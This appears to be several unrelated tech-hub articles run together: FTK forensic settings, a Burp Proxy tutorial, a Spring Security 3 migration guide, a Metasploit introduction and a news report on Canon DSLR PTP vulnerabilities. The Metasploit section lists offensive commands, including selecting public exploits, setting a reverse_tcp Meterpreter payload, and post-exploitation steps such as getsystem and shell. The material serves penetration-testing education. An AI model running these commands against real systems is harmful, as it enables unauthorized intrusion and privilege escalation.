The correct use of the Time Zone feature is of the utmost importance in computer forensics, because an incorrect setting can cause the MAC times of the files contained in the evidence to be reported incorrectly, leading a professional to use wrong information in an investigation report. Based on this, you must configure the time zone to reflect the location where the evidence was acquired. For example, if you conducted the acquisition of a computer that was located in Los Angeles, US, and brought the evidence to Sao Paulo, Brazil, where your lab is situated, you should set the time zone to Los Angeles so that the MAC times of the files reflect the actual moments of their modification, access, and creation.

FTK allows you to make that time zone change at the same time that you add new evidence to the case. Select the time zone of the location where the evidence was seized from the drop-down list in the Time Zone field. This is required to add evidence to the case. Take a look at the following screenshot:

You can also change the value of Time Zone after adding the evidence. In the menu toolbar, click on View and then click on Time Zone Display.

Mounting compound files

To locate important information during your investigation, you should expand individual compound file types. This lets you see the child files that are contained within a container, such as ZIP or RAR files. You can access this feature from the case manager's new case wizard, or from the Add Evidence or Additional Analysis dialogs. The following are some of the compound files that you can mount:

E-mail files: PST, NSF, DBX, and MSG
Compressed files: ZIP, RAR, GZIP, TAR, BZIP, and 7-ZIP
System files: Windows thumbnails, registry, PKCS7, MS Office, and EVT

If you don't mount compound files, the child files will not be located in keyword searches or filters. To expand compound files, perform the following steps:

Do one of the following: for new cases, click on the Custom button in the New Case Options dialog; for existing cases, go to Evidence | Additional Analysis.
Select Expand Compound Files.
Click on Expansion Options….
In the Compound File Expansions Options dialog, select the types of files that you want to mount.
Click on OK.

File and folder export

You may need to export some of the files or folders to help you perform an action outside of the FTK platform, or simply for evidence presentation. To export files or folders, you need to perform the following steps:

Select one or more files that you would like to export.
Right-click on the selection and select Export. A new dialog will open.

You can configure some settings before exporting, as follows:

File Options: This field has advanced options for exporting files and folders. You can use the default options for a simple export.
Items to Include: This field has the selection of files and folders that you will export. The options can be checked, listed, highlighted, or selected all together.
Destination base path: This field has the folder in which to save the files.

Take a look at the following screenshot:

Column settings

Columns present the properties and metadata related to the evidence data. By default, FTK presents the most commonly used columns. However, you can add or remove columns to help you quickly find relevant information. To manage columns in FTK, in the File List view, right-click on the column bar and select Column Settings…. The number of columns available is huge.
You can add or remove the columns that you need by simply selecting the type and clicking on the Add button:

FTK also has some templates of column settings. You can access them by clicking on Manage and navigating to Columns | Manage Columns:

You can use some of the ready-made templates, edit them, or create your own.
Quick start – Using Burp Proxy

Packt
03 Sep 2013
11 min read
(For more resources related to this topic, see here.)

At the top of Burp Proxy, you will notice the following three tabs:

intercept: HTTP requests and responses that are in transit can be inspected and modified from this window
options: Proxy configurations and advanced preferences can be tuned from this window
history: All intercepted traffic can be quickly analyzed from this window

If you are not familiar with the HTTP protocol or you want to refresh your knowledge, HTTP Made Really Easy, A Practical Guide to Writing Clients and Servers, found at http://www.jmarshall.com/easy/http/, represents a compact reference.

Step 1 – Intercepting web requests

After firing up Burp and configuring the browser, let's intercept our first HTTP request. During this exercise, we will intercept a simple request to the publisher's website:

In the intercept tab, make sure that Burp Proxy is properly stopping all requests in transit by checking the intercept button. This should be marked as intercept is on.
In the browser, type http://www.packtpub.com/ in the URL bar and press Enter.
Back in Burp Proxy, you should be able to see the HTTP request made by the browser. At this stage, the request is temporarily stopped in Burp Proxy, waiting for the user to either forward or drop it. For instance, press forward and return to the browser. You should see the home page of Packt Publishing, as you would when normally interacting with the website.
Again, type http://www.packtpub.com/ in the URL bar and press Enter. Let's press drop this time. Back in the browser, the page will contain the warning Burp proxy error: message was dropped by user. We have dropped the request, thus Burp Proxy did not forward it to the server. As a result, the browser received a temporary HTML page with the warning message generated by Burp, instead of the original HTML content.
Let's try one more time. Type http://www.packtpub.com/ in the URL bar of the browser and press Enter. Once the request is properly captured by Burp Proxy, the action button becomes active. Click on it to display the contextual menu. This is an important functionality, as it allows you to import the current web request into any of the other Burp tools. You can already imagine the potential of having a set of integrated tools that allow you to manipulate and analyze web requests so easily. For example, if we want to decode the request, we can simply click on send to decoder.

In Burp Proxy, we can also decide to automatically forward all requests without waiting for the user to either forward or drop the communication. By clicking on the intercept button, it is possible to switch from intercept is on to intercept is off. Nevertheless, the proxy will record all requests in transit. Also, Burp Proxy allows you to automatically intercept all responses matching specific characteristics. Take a look at the numerous options available in the intercept server response section within the Burp Proxy options tab. For example, it is possible to intercept the server's response only if the client's request was intercepted. This is extremely helpful while testing input validation vulnerabilities, as we are generally interested in evaluating the server's responses for all tampered requests. Or else, you may only want to intercept and inspect responses having a specific return code (for example, 200 OK).
Step 2 – Inspecting web requests

Once a request is properly intercepted, it is possible to inspect the entire content, headers, and parameters using one of the four Burp Proxy message analysis tabs:

raw: This view allows you to display the web request in raw format within a simple text editor. This is a very handy visualization, as it enables maximum flexibility for further changing the content.
params: In this view, the focus is on user-supplied parameters (GET/POST parameters, cookies). This is particularly important in the case of complex requests, as it allows you to consider all entry points for potential vulnerabilities. Whenever applicable, Burp Proxy will also automatically perform URL decoding. In addition, Burp Proxy will attempt to parse commonly used formats, including JSON.
headers: Similarly, this view displays the HTTP header names and values in tabular form.
hex: In the case of binary content, it is useful to inspect the hexadecimal representation of the resource. This view allows you to display a request as in a traditional hex editor.

The history tab enables you to analyze all web requests that have transited through the proxy:

Click on the history tab. At the top, Burp Proxy shows all the requests in the bundle. At the bottom, it displays the content of the request and response corresponding to the specific selection. If you have previously modified the request, Burp Proxy history will also display the modified version.

Displaying HTTP requests and responses intercepted by Burp Proxy

By double-clicking on one of the requests, Burp will automatically open a new window with the specific content. From this window, it is possible to browse all the captured communication using the previous and next buttons.
Back in the history tab, Burp Proxy displays several details for each item, including the request method, URL, response code, and length. Each request is uniquely identified by a number, visible in the left-hand side column. Click on the request identifier; Burp Proxy allows you to set a color for that specific item. This is extremely helpful to highlight important requests or responses. For example, during the initial application enumeration, you may notice an interesting request; you can mark it and get back to it later for further testing. Burp Proxy history is also useful when you have to evaluate a sequence of requests in order to reproduce a specific application behavior.
Click on the display filter, at the top of the history list, to hide irrelevant content. If you want to analyze all HTTP requests containing at least one parameter, select the show only parameterised requests checkbox. If you want to display requests having a specific response, just select the appropriate response code in the filter by status code selection.

At this point, you may have already understood the potential of the tool to filter and reveal interesting traffic. In addition, when using Burp Suite Professional, you can also use the filter by search term option. This feature is particularly important when you need to analyze hundreds of requests or responses, as you can filter only the relevant traffic by using regular expressions or simply matching particular strings. Using this feature, you may also be able to discover sensitive information (for example, credentials) embedded in the intercepted pages.
For example, to identify SQL injection vulnerabilities, it is important to inject common attack vectors (for example, a single quote) into all user-supplied input, including HTTP headers, cookies, and GET/POST parameters. If you want to refresh your knowledge on common web application vulnerabilities, the OWASP Top Ten Project at https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project is a good starting point.

Tampering web requests with Burp is as easy as editing strings in a text editor:

Intercept a request containing at least one HTTP parameter. For example, you can point your browser to http://www.packtpub.com/books/all?keys=ASP.
Go to Burp Proxy | Intercept. At this point, you should see the corresponding HTTP request.
From the raw view, you can simply edit any aspect of the web request in transit. For example, you can change the value of the GET parameter keys from ASP to PHP. Edit the request to look like the following:

GET /books/all?keys=PHP HTTP/1.1
Host: www.packtpub.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive

Click on forward and get back to the browser. This should result in a search query performed with the string PHP. You can verify it by simply checking the results in the HTML page.

Although we have used the raw view to change the previous HTTP request, it is actually possible to use any of the Burp Proxy views. For example, in the params view, it is possible to add a new parameter by:

Clicking on new (right side) from the Burp Proxy params view.
Selecting the proper parameter type (URL, body, or cookie). URL should be used for GET parameters, whereas body denotes POST parameters.
Typing the name and the value of the newly created parameter.

Advanced features

After practicing with the basic features provided by Burp Proxy, you are almost ready to experiment with more advanced configurations.

Match and replace

Let's imagine that you are testing an application designed for mobile devices using a standard browser on your computer. In most cases, the web server examines the user-agent provided by the browser to identify the specific platform and respond with customized resources that better fit mobile phones and tablets. Under these circumstances, you will find the match and replace function provided by Burp Proxy particularly useful. Let's configure Burp Proxy in order to tamper with the User-Agent HTTP header field:

In the options tab of Burp Proxy, scroll down to the match and replace section.
Under the match and replace table, a drop-down list and two text fields allow you to create a customized rule. Select request header from the drop-down list, since we want to create a match condition pertaining to HTTP requests.
Type ^User-Agent.*$ in the first text field. This field represents the match within the HTTP request. Burp Proxy's match and replace feature allows you to use simple strings as well as complex regular expressions. If you are not familiar with regular expressions, have a look at http://www.regular-expressions.info/quickstart.html.
In the second text field, type Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1C25 Safari/419.3 or any other fake user-agent that you want to impersonate.
Click add and verify that the new match has been added to the list; this button is shown here:

Burp Proxy match and replace list

Intercept a request, leave it to pass through the proxy, and verify that it has been automatically modified by the tool.

Automatically modified HTTP header in Burp Proxy

HTML modification

Another interesting feature of Burp Proxy is automatic HTML modification, which can be activated and configured in the appropriate section within Burp Proxy | options. By using this function, you can automatically remove JavaScript or modify the HTML forms of all received HTTP responses. Some applications deploy client-side validation in the form of disabled HTML form fields or JavaScript code. If you want to verify the presence of server-side controls that enforce specific data formats, you would need to tamper with the request using invalid data. In these situations, you can either manually tamper with the request in the proxy or enable HTML modification to remove any client-side validation and use the browser to submit invalid data. This function can also be used to display hidden form fields. Let's see in practice how you can activate this feature:

In Burp Proxy, go to options and scroll down to the HTML modification section. Numerous options are available here: unhide hidden form fields to display hidden HTML form fields, enable disabled form fields to submit all input forms present inside the HTML page, remove input field length limits to allow extra-long strings in the text fields, remove JavaScript form validation to make Burp Proxy remove all onsubmit handler JavaScript functions from HTML forms, remove all JavaScript to completely remove all JS scripts, and remove object tags to remove embedded objects within the HTML document.
Select the desired checkboxes to activate automatic HTML modification.

Summary

Using this feature, you will be able to understand whether the web application enforces server-side validation. For instance, some insecure applications use client-side validation only (for example, via JavaScript functions). You can activate the automatic HTML modification feature by selecting the remove JavaScript form validation checkbox in order to perform input validation testing directly from your browser.

Resources for Article:

Further resources on this subject: Visual Studio 2010 Test Types [Article] Ordered and Generic Tests in Visual Studio 2010 [Article] Manual, Generic, and Ordered Tests using Visual Studio 2008 [Article]
Migration to Spring Security 3

Packt
21 May 2010
5 min read
(For more resources on Spring, see here.)

During the course of this article, we will:

Review important enhancements in Spring Security 3
Understand the configuration changes required in your existing Spring Security 2 applications when moving them to Spring Security 3
Illustrate the overall movement of important classes and packages in Spring Security 3

Once you have completed the review of this article, you will be in a good position to migrate an existing application from Spring Security 2 to Spring Security 3.

Migrating from Spring Security 2

You may be planning to migrate an existing application to Spring Security 3, or trying to add functionality to a Spring Security 2 application and looking for guidance. We'll try to address both of these concerns in this article. First, we'll run through the important differences between Spring Security 2 and 3, both in terms of features and configuration. Second, we'll provide some guidance on mapping configuration or class name changes. These will better enable you to translate the examples from Spring Security 3 back to Spring Security 2 (where applicable). A very important migration note is that Spring Security 3 mandates a migration to Spring Framework 3 and Java 5 (1.5) or greater. Be aware that in many cases, migrating these other components may have a greater impact on your application than the upgrade of Spring Security!

Enhancements in Spring Security 3

Significant enhancements in Spring Security 3 over Spring Security 2 include the following:

The addition of Spring Expression Language (SpEL) support for access declarations, both in URL patterns and method access specifications (a brief example appears at the end of this overview)
Additional fine-grained configuration around authentication and access success and failure handling
Enhanced capabilities for method access declarations, including annotation-based pre- and post-invocation access checks and filtering, as well as highly configurable security namespace XML declarations for custom backing bean behavior
Fine-grained management of session access and concurrency control using the security namespace
Noteworthy revisions to the ACL module, with the removal of the legacy ACL code in o.s.s.acl, and fixes for some important issues in the ACL framework
Support for OpenID Attribute Exchange, and other general improvements to the robustness of OpenID
New Kerberos and SAML single sign-on support through the Spring Security Extensions project

Other, more innocuous changes encompassed a general restructuring and cleaning up of the codebase and the configuration of the framework, such that the overall structure and usage make much more sense. The authors of Spring Security have made efforts to add extensibility where none previously existed, especially in the areas of login and URL redirection.

If you are already working in a Spring Security 2 environment, you may not find compelling reasons to upgrade if you aren't pushing the boundaries of the framework. However, if you have found limitations in the available extension points, code structure, or configurability of Spring Security 2, you'll welcome many of the minor changes that we discuss in detail in the remainder of this article.

Changes to configuration in Spring Security 3

Many of the changes in Spring Security 3 will be visible in the security namespace style of configuration. Although this article cannot cover all of the minor changes in detail, we'll try to cover those changes that will be most likely to affect you as you move to Spring Security 3.
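As a quick illustration of the SpEL-based access declarations mentioned among the enhancements, here is a minimal, hedged sketch of a Spring Security 3 URL configuration; the URL patterns, role name, and IP range are illustrative values, not taken from the original text:

<http use-expressions="true">
  <intercept-url pattern="/admin/**" access="hasRole('ROLE_ADMIN') and hasIpAddress('192.168.1.0/24')"/>
  <intercept-url pattern="/**" access="isAuthenticated()"/>
</http>

Setting use-expressions="true" on the <http> element switches the access attribute from plain role lists to SpEL expressions, which is what makes combinations such as a role check plus an IP restriction possible in a single declaration.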
Rearranged AuthenticationManager configuration

The most obvious changes in Spring Security 3 deal with the configuration of the AuthenticationManager and any related AuthenticationProvider elements. In Spring Security 2, the AuthenticationManager and AuthenticationProvider configuration elements were completely disconnected: declaring an AuthenticationProvider didn't require any notion of an AuthenticationManager at all.

<authentication-provider>
  <jdbc-user-service data-source-ref="dataSource"/>
</authentication-provider>

In Spring Security 2, it was possible to declare the <authentication-manager> element as a sibling of any AuthenticationProvider:

<authentication-manager alias="authManager"/>
<authentication-provider>
  <jdbc-user-service data-source-ref="dataSource"/>
</authentication-provider>
<ldap-authentication-provider server-ref="ldap://localhost:10389/"/>

In Spring Security 3, all AuthenticationProvider elements must be children of the <authentication-manager> element, so this would be rewritten as follows:

<authentication-manager alias="authManager">
  <authentication-provider>
    <jdbc-user-service data-source-ref="dataSource"/>
  </authentication-provider>
  <ldap-authentication-provider server-ref="ldap://localhost:10389/"/>
</authentication-manager>

Of course, this means that the <authentication-manager> element is now required in any security namespace configuration. If you had defined a custom AuthenticationProvider in Spring Security 2, you would have decorated it with the <custom-authentication-provider> element as part of its bean definition:

<bean id="signedRequestAuthenticationProvider"
    class="com.packtpub.springsecurity.security.SignedUsernamePasswordAuthenticationProvider">
  <security:custom-authentication-provider/>
  <property name="userDetailsService" ref="userDetailsService"/>
  <!-- ... -->
</bean>

When moving this custom AuthenticationProvider to Spring Security 3, we would remove the decorator element and instead configure the AuthenticationProvider using the ref attribute of the <authentication-provider> element, as follows:

<authentication-manager alias="authenticationManager">
  <authentication-provider ref="signedRequestAuthenticationProvider"/>
</authentication-manager>

Of course, the source code of our custom provider would change due to class relocations and renaming in Spring Security 3; look later in the article for basic guidelines, and in the code download for this article to see a detailed mapping.

New configuration syntax for session management options

In addition to continuing support for the session fixation and concurrency control features from prior versions of the framework, Spring Security 3 adds new configuration capabilities for customizing the URLs and classes involved in session and concurrency control management. If your older application was configuring session fixation protection or concurrent session control, the configuration settings have a new home in the <session-management> directive of the <http> element. In Spring Security 2, these options would be configured as follows:

<http ... session-fixation-protection="none">
  <!-- ... -->
  <concurrent-session-control exception-if-maximum-exceeded="true" max-sessions="1"/>
</http>

The analogous configuration in Spring Security 3 removes the session-fixation-protection attribute from the <http> element and consolidates it as follows:

<http ...>
  <session-management session-fixation-protection="none">
    <concurrency-control error-if-maximum-exceeded="true" max-sessions="1"/>
  </session-management>
</http>

You can see that the new logical organization of these options is much more sensible and leaves room for future expansion.
Getting Started with Metasploit

Packt
22 Jun 2017
10 min read
In this article by Nipun Jaswal, the author of the book Metasploit Bootcamp, we will be covering the following topics:

Fundamentals of Metasploit
Benefits of using Metasploit

(For more resources related to this topic, see here.)

Penetration testing is the art of performing a deliberate attack on a network, web application, server, or any device that requires a thorough checkup from a security perspective. The idea of a penetration test is to uncover flaws while simulating real-world threats. A penetration test is performed to figure out vulnerabilities and weaknesses in systems so that vulnerable systems can stay immune to threats and malicious activities. Achieving success in a penetration test largely depends on using the right set of tools and techniques. A penetration tester must choose the right set of tools and methodologies in order to complete a test. While talking about the best tools for penetration testing, the first one that comes to mind is Metasploit. It is considered one of the most practical tools to carry out penetration testing today. Metasploit offers a wide variety of exploits, a great exploit development environment, information gathering and web testing capabilities, and much more.

The fundamentals of Metasploit

Now that we have completed the setup of Kali Linux, let us talk about the big picture: Metasploit. Metasploit is a security project that provides exploits and tons of reconnaissance features to aid a penetration tester. Metasploit was created by H.D. Moore back in 2003, and since then, its rapid development has led it to be recognized as one of the most popular penetration testing tools. Metasploit is entirely a Ruby-driven project and offers a great deal of exploits, payloads, encoding techniques, and loads of post-exploitation features.

Metasploit comes in various editions, as follows:

Metasploit Pro: This is a commercial edition that offers tons of great features, such as web application scanning and exploitation and automated exploitation, and is quite suitable for professional penetration testers and IT security teams. The Pro edition is used for advanced penetration tests and enterprise security programs.
Metasploit Express: The Express edition is used for baseline penetration tests. Features in this version of Metasploit include smart exploitation, automated brute forcing of credentials, and much more. This version is quite suitable for IT security teams in small to medium-sized companies.
Metasploit Community: This is a free version with reduced functionality compared to the Express edition. However, for students and small businesses, this edition is a favorable choice.
Metasploit Framework: This is a command-line version with all manual tasks such as manual exploitation, third-party import, and so on. This release is entirely suitable for developers and security researchers.

You can download Metasploit from the following link: https://www.rapid7.com/products/metasploit/download/editions/

We will be using the Metasploit Community and Framework versions. Metasploit also offers various types of user interfaces, as follows:

The graphical user interface (GUI): This has all the options available at the click of a button. It offers a user-friendly interface that helps to provide cleaner vulnerability management.
The console interface: This is the most preferred and most popular interface. It provides an all-in-one approach to all the options offered by Metasploit, and it is also considered one of the most stable interfaces.
The command-line interface: This is the more potent interface that supports launching exploits and activities such as payload generation. However, remembering each and every command while using the command-line interface is a difficult job.
Armitage: Armitage by Raphael Mudge added a neat hacker-style GUI interface to Metasploit. Armitage offers easy vulnerability management, built-in NMAP scans, exploit recommendations, and the ability to automate features using the Cortana scripting language.

Basics of the Metasploit framework

Before we put our hands onto the Metasploit framework, let us understand the basic terminology used in Metasploit. However, the following are not just terms but modules that are the heart and soul of the Metasploit project:

Exploit: This is a piece of code which, when executed, will trigger the vulnerability at the target.
Payload: This is a piece of code that runs at the target after successful exploitation. It defines the type of access and actions we need to gain on the target system.
Auxiliary: These are modules that provide additional functionality such as scanning, fuzzing, sniffing, and much more.
Encoder: Encoders are used to obfuscate modules to avoid detection by a protection mechanism such as an antivirus or a firewall.
Meterpreter: This is a payload that uses in-memory stagers based on DLL injection. It provides a variety of functions to perform at the target, which makes it a popular choice.

Architecture of Metasploit

Metasploit comprises various components, such as extensive libraries, modules, plugins, and tools. A diagrammatic view of the structure of Metasploit is as follows:

Let's see what these components are and how they work. It is best to start with the libraries that act as the heart of Metasploit. Let's understand the use of the various libraries, as explained in the following table:

REX: Handles almost all core functions, such as setting up sockets, connections, formatting, and all other raw functions.
MSF CORE: Provides the underlying API and the actual core that describes the framework.
MSF BASE: Provides friendly API support to modules.

We have many types of modules in Metasploit, and they differ in functionality. We have payload modules for creating access channels to exploited systems. We have auxiliary modules to carry out operations such as information gathering, fingerprinting, fuzzing an application, and logging into various services. Let's examine the basic functionality of these modules, as shown in the following table:

Payloads: Payloads are used to carry out operations such as connecting to or from the target system after exploitation, or performing a particular task such as installing a service and so on. Payload execution is the next step after the system is exploited successfully.
Auxiliary: Auxiliary modules are a special kind of module that performs specific tasks such as information gathering, database fingerprinting, scanning the network to find a particular service, enumeration, and so on.
Encoders: Encoders are used to encode payloads and attack vectors to (or intending to) evade detection by antivirus solutions or firewalls.
NOPs: NOP generators are used for alignment, which results in making exploits stable.
Exploits: The actual code that triggers a vulnerability.

Metasploit framework console and commands

Having gathered knowledge of the architecture of Metasploit, let us now run Metasploit to get hands-on knowledge of the commands and the different modules. To start Metasploit, we first need to establish a database connection so that everything we do can be logged into the database. However, using the database also speeds up Metasploit's load time by making use of a cache and indexes for all modules. Therefore, let us start the postgresql service by typing the following command at the terminal:

root@beast:~# service postgresql start

Now, to initialize Metasploit's database, let us initialize msfdb as shown in the following screenshot:

It is clearly visible in the preceding screenshot that we have successfully created the initial database schema for Metasploit. Let us now start Metasploit's database using the following command:

root@beast:~# msfdb start

We are now ready to launch Metasploit. Let us issue msfconsole in the terminal to start Metasploit, as shown in the following screenshot:

Welcome to the Metasploit console. Let us run the help command to see what other commands are available to us:

The commands in the preceding screenshot are core Metasploit commands, which are used to set/get variables, load plugins, route traffic, unset variables, print the version, find the history of issued commands, and much more. These commands are pretty general. Let's see the module-based commands, as follows:

Everything related to a particular module in Metasploit comes under the module controls section of the help menu. Using the preceding commands, we can select a particular module, load modules from a particular path, get information about a module, show core and advanced options related to a module, and even edit a module inline.
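To make these module controls concrete, the following is a minimal console session sketch; the module, target address, and port range are illustrative values rather than commands taken from the original text:

msf > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > show options
msf auxiliary(tcp) > set RHOSTS 192.168.10.112
msf auxiliary(tcp) > set PORTS 1-1000
msf auxiliary(tcp) > run
msf auxiliary(tcp) > back

The same select-configure-run pattern applies to exploit modules, with the exploit command taking the place of run.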
Let us learn some basic commands in Metasploit and familiarize ourselves with their syntax and semantics:

use [auxiliary/exploit/payload/encoder]: To select a particular module. Examples: msf> use exploit/unix/ftp/vsftpd_234_backdoor, msf> use auxiliary/scanner/portscan/tcp
show [exploits/payloads/encoder/auxiliary/options]: To see the list of available modules of a particular type. Examples: msf> show payloads, msf> show options
set [options/payload]: To set a value for a particular object. Examples: msf> set payload windows/meterpreter/reverse_tcp, msf> set LHOST 192.168.10.118, msf> set RHOST 192.168.10.112, msf> set LPORT 4444, msf> set RPORT 8080
setg [options/payload]: To assign a value to a particular object globally, so the value does not change when a module is switched. Example: msf> setg RHOST 192.168.10.112
run: To launch an auxiliary module after all the required options are set. Example: msf> run
exploit: To launch an exploit. Example: msf> exploit
back: To unselect a module and move back. Example: msf(ms08_067_netapi)> back, then msf>
info: To list the information related to a particular exploit/module/auxiliary. Examples: msf> info exploit/windows/smb/ms08_067_netapi, msf(ms08_067_netapi)> info
search: To find a particular module. Example: msf> search hfs
check: To check whether a particular target is vulnerable to the exploit or not. Example: msf> check
sessions: To list the available sessions. Example: msf> sessions [session number]

The following are some useful Meterpreter commands:

sysinfo: To list the system information of the compromised host. Example: meterpreter> sysinfo
ifconfig: To list the network interfaces on the compromised host. Examples: meterpreter> ifconfig, meterpreter> ipconfig (Windows)
arp: To list the IP and MAC addresses of hosts connected to the target. Example: meterpreter> arp
background: To send an active session to the background. Example: meterpreter> background
shell: To drop a cmd shell on the target. Example: meterpreter> shell
getuid: To get the current user details. Example: meterpreter> getuid
getsystem: To escalate privileges and gain system access. Example: meterpreter> getsystem
getpid: To get the process ID of the meterpreter session. Example: meterpreter> getpid
ps: To list all the processes running on the target. Example: meterpreter> ps

If you are using Metasploit for the very first time, refer to http://www.offensive-security.com/metasploit-unleashed/Msfconsole_Commands for more information on basic commands.

Benefits of using Metasploit

Metasploit is an excellent choice when compared to traditional manual techniques because of certain factors, which are listed as follows:

The Metasploit framework is open source
Metasploit supports large testing networks by making use of CIDR identifiers
Metasploit offers quick generation of payloads, which can be changed or switched on the fly
Metasploit leaves the target system stable in most cases
The GUI environment provides a fast and user-friendly way to conduct penetration testing

Summary

Throughout this article, we learned the basics of Metasploit. We learned about the syntax and semantics of various Metasploit commands. We also learned the benefits of using Metasploit.

Resources for Article:

Further resources on this subject: Approaching a Penetration Test Using Metasploit [article] Metasploit Custom Modules and Meterpreter Scripting [article] So, what is Metasploit? [article]
Vulnerabilities in the Picture Transfer Protocol (PTP) allows researchers to inject ransomware in Canon’s DSLR camera

Savia Lobo
13 Aug 2019
5 min read
At DefCon 27, Eyal Itkin, a vulnerability researcher at Check Point Software Technologies, demonstrated how vulnerabilities in the Picture Transfer Protocol (PTP) allowed him to infect a Canon EOS 80D DSLR with ransomware over a rogue WiFi connection. Besides image transfer, PTP also supports dozens of different commands that cover anything from taking a live picture to upgrading the camera's firmware.

The researcher chose Canon's EOS 80D DSLR camera for three major reasons:

Canon is the largest DSLR maker, controlling more than 50% of the market.
The EOS 80D supports both USB and WiFi.
Canon has an extensive "modding" community, called Magic Lantern, an open-source free software add-on that adds new features to the Canon EOS cameras.

Eyal Itkin highlighted six vulnerabilities in the PTP implementation that can easily allow a hacker to infiltrate the DSLR, inject ransomware, and lock the device. The users might then have to pay a ransom to free up their camera and picture files.

CVE-2019-5994 – Buffer Overflow in SendObjectInfo (opcode 0x100C)
CVE-2019-5998 – Buffer Overflow in NotifyBtStatus (opcode 0x91F9)
CVE-2019-5999 – Buffer Overflow in BLERequest (opcode 0x914C)
CVE-2019-6000 – Buffer Overflow in SendHostInfo (opcode 0x91E4)
CVE-2019-6001 – Buffer Overflow in SetAdapterBatteryReport (opcode 0x91FD)
CVE-2019-5995 – Silent malicious firmware update

Itkin's team informed Canon about the vulnerabilities in their DSLR on March 31, 2019. Recently, on August 6, Canon published a security advisory informing users that "at this point, there have been no confirmed cases of these vulnerabilities being exploited to cause harm" and asking them to take the advised measures to ensure safety.

Itkin told The Verge, "due to the complexity of the protocol, we do believe that other vendors might be vulnerable as well, however, it depends on their respective implementation". Though Itkin said he worked only with the Canon model, he also said DSLRs from other companies may be at high risk.

Vulnerability discovery by Itkin's team in Canon's DSLR

After Itkin's team succeeded in dumping the camera's firmware and loading it into their disassembler (IDA Pro), they say finding the PTP layer was an easy task, for two reasons:

The PTP layer is command-based, and every command has a unique numeric opcode.
The firmware contains many indicative strings, which eases the task of reverse-engineering it.

Next, the team traversed back from the PTP OpenSession handler and found the main function that registers all of the PTP handlers according to their opcodes. "When looking on the registration function, we realized that the PTP layer is a promising attack surface. The function registers 148 different handlers, pointing to the fact that the vendor supports many proprietary commands. With almost 150 different commands implemented, the odds of finding a critical vulnerability in one of them is very high," Itkin wrote in the research report.

Each PTP command handler implements the same code API. The API makes use of the ptp_context object, an object that is partially documented thanks to ML (Magic Lantern), Itkin said. The team realized that most of the commands were relatively simple. "They receive only a few numeric arguments, as the protocol supports up to 5 such arguments for every command. After scanning all of the supported commands, the list of 148 commands was quickly narrowed down to 38 commands that receive an input buffer," Itkin writes.
"From an attacker's viewpoint, we have full control of this input buffer, and therefore, we can start looking for vulnerabilities in this much smaller set of commands. Luckily for us, the parsing code for each command uses plain C code and is quite straight-forward to analyze," he further added. Following this, they were able to find their first vulnerabilities, and then the rest.

Check Point and Canon have advised users to ensure that their cameras are using the latest firmware and to install patches whenever they become available. Also, if the device is not in use, camera owners should keep the device's Wi-Fi turned off.

A user on HackerNews points out, "It could get even worse if the perpetrator instead of bricking the device decides to install a backdoor that silently uploads photos to a server whenever a wifi connection is established."

Another user on Petapixel explained what quick measures users should take: "A custom firmware can close the vulnerability also if they put in the work. Just turn off wifi and don't use random computers in grungy cafes to connect to your USB port and you should be fine. It may or may not happen but it leaves the door open for awesome custom firmware to show up. Easy ones are real CLOG for 1dx2. For the 5D4, I would imagine 24fps HDR, higher res 120fps, and free Canon Log for starters. For non tech savvy people that just leave wifi on all the time, that visit high traffic touristy photo landmarks they should update. Especially if they have no interest in custom firmware."

Another user on Petapixel highlighted the fact that "this hack relies on a serious number of things to be in play before it works, there is no mention of how to get the camera working again, is it just a case of flashing the firmware and accepting you may have lost a few images ?... there's a lot more things to worry about than this."

Check Point has demonstrated the entire attack in the following YouTube video: https://youtu.be/75fVog7MKgg

To know more about this news in detail, read Eyal Itkin's complete research on Check Point.

Researchers reveal vulnerability that can bypass payment limits in contactless Visa card
Apple patched vulnerability in Mac's Zoom Client; plans to address 'video on by default'
VLC media player affected by a major vulnerability in a 3rd library, libebml